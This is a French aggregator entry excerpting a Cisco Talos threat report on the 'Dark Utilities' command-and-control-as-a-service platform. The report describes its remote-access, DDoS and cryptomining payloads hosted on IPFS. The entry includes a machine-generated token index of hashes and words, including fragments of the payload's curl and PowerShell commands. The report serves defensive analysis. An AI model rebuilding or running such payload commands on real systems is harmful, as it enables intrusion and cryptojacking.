One Article Review
| Source |  CISCO Talos |
|---|---|
| Identifiant | 6123175 |
| Date de publication | 2022-08-04 08:00:13 (vue: 2022-08-04 12:06:28) |
| Titre | Attackers leveraging Dark Utilities "C2aaS" platform in malware campaigns |
| Texte |  By Edmund Brumaghin, Azim Khodjibaev and Matt Thaxton, with contributions from Arnaud Zobec.Executive SummaryDark Utilities, released in early 2022, is a platform that provides full-featured C2 capabilities to adversaries.It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems.Payloads provided by the platform support Windows, Linux and Python-based implementations and are hosted within the Interplanetary File System (IPFS), making them resilient to content moderation or law enforcement intervention.Since its initial release, we've observed malware samples in the wild leveraging it to facilitate remote access and cryptocurrency mining.What is "Dark Utilities?"In early 2022, a new C2 platform called "Dark Utilities" was established, offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The operators of the service also established Discord and Telegram communities where they provide technical support and assistance for customers on the platform.  Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing develo |
| Envoyé | Oui |
| Condensat | $env:username $uri –noprofile //ipfs /tcp /tmp/;curl 000 09fd574a005f800e6eb37d7e2a3ca640d3ac3ac7dbbde42cbe85aa9e877c1f7f0a351f3c9fb0add1397a8e984801061ded0802a3c45d9a5fc7098e806011a4640d76fa68b7d788b37c9e0368222819a9ea3f53c70de61e5899cfbeff4b77b9281e6e0918d2c93d452d9b3fbcac2cb3202ae3d97394eae6239c2d112791ec8260240d2029d6f1ca1ee8b5c2d5f0aa862724502f71c48d5544ee053def4c0d83ec24a5f9a37ed983e9377e0a5c7c5e20db279e3f1bd62acbd7a038fd75b16866172e377087d0d2cb90b631ab0543f60d3d5d56db8af858cf625e7a9a26c87265852edc356fe59c53ce6232707ae32e15e223c85bbaef5ed6a4767d5c216c3fd4e736a1b2c71afe03cc7a0f8eb96b987283bf174eafaade62c20ec8fd6c1b0c1d9338ee6cc72b373228f7ffddbbf0f78734f85600d84095b057651028472777bde841a7d1fa7c70a82656d2fa971befd8fa47a16815a30ff3f671794b0377d886b3464864cf0c19885d867fdeebec68d72adb72d91910d39f5fc0d0a9c4e3b7ea534c252e74d77d50263430c388c08dc522aaeb15ef440c453b2876330a392b85de4d471cf939cc9d483587b74c0ffebed1b8a3f198d626e4a08d93d689f98122c850d0f98b17ca7d37dc8cd70cca2bad4c920b2bb1c059292fe6d203e94716f9bf52ad5431eeac730b3ff3cfd555d7d6f3fd4b127c9f2d7aa02fc64e48c2eb0ff552ba9b0afe0d13957f7f49383b2c1d106e17b4a42c3819973d9862ded75593105537a103aebc9237ba6dbc208c4a72c9944fb5de5b676ec684bd4f08b2c49fe7645190d1702b309b3db5fbbad7ac747afb57fd8119daf39f17f5b5b5868fb136646b798f9a3251e44703b6e72858dbb854b9d4fb8553fe1e387903b06f4bfe5065a1b3fb9430c7342d13f79b460b2cc7d9f9ddced2aeecd37f2862a67083e68c6aa4dceb8c7b468fed2fa1c0b275a0bc4b1500325a3ad42576e7b3b98218614f6b5b632f9db3a10cf893c496acbf8aecf460c75353af175ab3d90b9af84d4ca36c29ff8b0fae690356f85138b843ea2e2202e115e4b1213d96372b9eeef4f42c6ca488cfbee32e4ea6af8a43b1e0b1a09c8653db7780aa5ff3661e1da31d751a70706788666c7190803d6760e857e40d076ae69dc6cc172f517a46d8107127e672de1dafc8517aa82578b53518959642dc1aede81fc2da9fe01b5070100560d674984b6e514a4b77f20ed65a8b490313cbf80319eb3310ed8bca76f83e449564755e02e1cc3357ec78a218347e4b40aa81783f01658cdf9fc0558e21d2d982ad7e183f6c9e69535324f5e05bea3fde54a3151c9433717a9111bde6423eaee19283fd0ced1eaf5f671c3837592684fb04a386649d2eaa12aa525fb73ac3b94a1a8c59a3125891d8864f385724cd2412e099b88d1a9023a63fd61944ad0f4631d192aa81228137d571be956045cf673603e994c5e6d1a35559881e34b99e1e01fa9d82b17a781835d1f2101e08a628fd834d05fabd53750fee8a0e5565dbdc78429e7fd31dfd530a8df90b80c4ae8ca89484e204a8c036125324cd39aa5cd8b562a2e17c802369254de783115c1c47ddb2ae0e117d3f4be99a8d528f50f7a55e5da8fda5e327d5f66a96657cb54d229f029e8e468aac30707331c77dbc53a0e82bad50c79f66f6a7b7d8db43105fc931b7f74e1c9efb97e0867cafb373834e88ceb0f1d43105a2d2b9efb2f36141eaf3f57dc6d7b1593bb31c5a8710614a08c8ccb291dd56fc5b56d534c763f2d16d2ad340d6fbb735425d635af3fa0063063698c1cba31a9eb73ea745f5cda1bdf84dc91734821e0899af058ecad5b1e458936cc9deeda7cd7adb4ff584d13ea64cdb50c9e8b5c616f1dff476f372e86c9b9be6cacab4c0e3af52bb7f620efc8f676b74caf1dc51983596e6a4a2ac50c5f39528cd663bbe19ef09b76572cb6960d69e78639aad55b38758597d16deb3a541519fcf4491029155a703195104cab5fdf314dc1b14b520b2305e66b67e78e240b43cdf6685c4d90ee92854eb7ab91b26eda43933a1a3a8ac3eefc957b1359faa8beae32d67b7d62bcaf06618794c0f93e31a03d3b2735d0af191a09092aa4512a37ae4caf4131dc51c6f44bc75a26061623da269bf20a255c62f5b4a4ab934c7da53e4eacbcd8ee561f073de7819d84e885c8a1d58614c052c135240783b078e164aed9d7558433a9d4fe0b6f632b8f3376aec26fb2a23d6cf2fe1d39c17a544ef39f6f376c7b1f78fbf2354d2a908ef4ea17bf5e05d0c98af13052d1bc678ae2ebdb11e566bd9f76563be3e53b1d5b49a2abc84bc89d361b58cb9f7ba85600ddea4domainsdark 2022 60319 60325 78e6 7916 7956 ;$uri ;curl ;mkdir about access accessed accessing account achieve across action activated activating active activities activity actor actors actually adaptive added additional address admin administer administering administration administrative advanced adversaries adversary advertisement advertising after against all allow allowing allows almost along alphanumeric already also although among amongus amount amounts amp analysis analysisthe analytics analyzed any api appdata appear appears appliance appliances applicable application approach approximately arbitrary architecture architectures are areas arm64 armv71 arnaud arrested aside assess assistance |
| Tags | Spam Malware Hack Tool Threat Guideline |
| Stories | APT 19 |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.